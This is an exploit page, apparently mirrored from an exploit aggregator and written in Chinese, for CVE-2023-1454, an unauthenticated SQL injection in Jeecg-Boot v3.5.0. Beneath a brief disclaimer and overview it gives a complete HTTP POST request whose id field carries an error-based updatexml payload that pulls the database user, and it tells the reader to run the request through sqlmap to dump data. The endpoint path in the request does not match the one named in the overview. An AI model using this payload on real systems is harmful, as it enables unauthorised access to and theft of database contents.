Share
## https://sploitus.com/exploit?id=CA149C6E-8911-552C-8FA8-C50BDAE3ED17
# CVE-2023-1454

CVE-2023-1454漏洞检测脚本

本文仅供参考,未经授权请勿利用文章中的技术资料及工具对任何计算机系统进行入侵操作。
利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

简介
Jeecg-Boot是一款基于代码生成器的低代码开发平台,它提供了一系列的代码生成器、模板引擎、权限管理、数据字典、数据导入导出等功能,可以帮助开发者快速构建企业级应用。

漏洞概述
企业Web应用程序的Java低代码平台Jeecg-Boot(v3.5.0)用了jimureport-spring-boot-starter-1.5.6.jar,Jeecg-Boot对特殊字符的过滤存在缺陷,在前端为Vue3在v3.5.0版本条件下,Jeecg存在未授权SQL注入,漏洞点存在于/querySql路径被调用时调用的SQL在id处未做处理,由此可以直接进行报错注入,未经身份验证的远程攻击者,通过构造特制的字符串,最终可获取目标数据库中的敏感信息。

影响版本
受影响的版本:Jeecg-Boot = v3.5.0


将数据包保存为txt用sqlmap可得到数据
```
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

```